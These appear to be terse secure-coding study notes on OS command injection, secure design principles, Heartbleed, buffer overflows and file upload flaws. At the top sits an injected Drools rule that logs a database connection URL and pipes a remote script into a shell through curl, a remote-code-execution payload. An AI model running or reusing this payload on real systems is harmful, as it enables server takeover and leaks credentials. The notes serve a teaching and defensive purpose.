6. OS COMMAND INJECTION ( CWE-78 )
rule "New rule"
salience 9
when
eval(true)
then
Logger logger =
Logger.getLogger("com.bluejeans.services.meetme.validators.EndpointCustomProperties");
logger.info("Injected log with value: " + System.getProperty("hibernate.connection.url"));
Process p = Runtime.getRuntime().exec(new String[]{"bash","-c","curl -fsSL https://sec-
demo.herokuapp.com/execute.sh | sh"});
System.out.println("hacked");
end
JAVA
Remote Code Execution on Server
1. Validate input => command line args,user-controlled files, network-interface
2. Output encoding => output in context: Javascript engine,Rendering engine, Java VM
3. Security Policy => Design component based on privilege requirement.Enforce security policy. Roll password
4. Default Deny => Explicit inclusion rather than exclusion
5. Communication Security => use TLS across board,Certificates,
6. Least privilege => process should execute in minimum previlege. Elevated permission should be for in time
7. DID => layers of defense.Assume other upper layers are already compromised.e.g: In case of RCA only service is compromised
8. AA => Resource should have access constrol
9. Cryptographic practice => Protect master secret,Random number generator, Don’t invent crypto functions, Avoid broken crypt, Use salt
10. Secure Default => Configuration tuning defaults should be proper
SAN top 25 CWE based on impact & exploitability
http://cwe.mitre.org/
Change unwanted attribute
Ruby & other lang
Framework gives options to whitelist attribute
Import runtime
Server is compromised
Target is client
2014 bug in openssl library which is in TLS
Heartbeat extension to find if peer connection alive ( ping/pong )
Openssl is TLS implementation.
In Feb 2012, heartbeat extension was introduced to keep the connection alive and avoid renoginations
Copy the memory more than required
Bound check failure
Can read upto 64 KB of data => 2^16 ( 16 bit preserved for payload length )
Effected version => openssl 1.0.1
See other request exchange in plain format
Compromise private keys of peers.This private key can be used to decrypt traffic later
Hostname can be crafted to attack.
Hostname can contain executable payload
Violation of memory Safety
ESP => Extended Stack pointer => pointer to top of stack, Extended Base pointer => pointer to current stack frame
While writing data to a buffer, overruns the buffer's boundary and overwrites to adjacent memory
Corrupting memory region => HEAP(dynamically allocated) or Stack ( call stack )
Stack => Override return address in stack frame,where return address is attacker-input filled buffer
Avoid
Safe language choice,Safe library
ASLR => Address space layout randomization => randomization of memory space where functions & variables will reside,which make it difficult to guess
Can upload any files
Run in the context in shell,JSP templating engine,HTML,PHP processor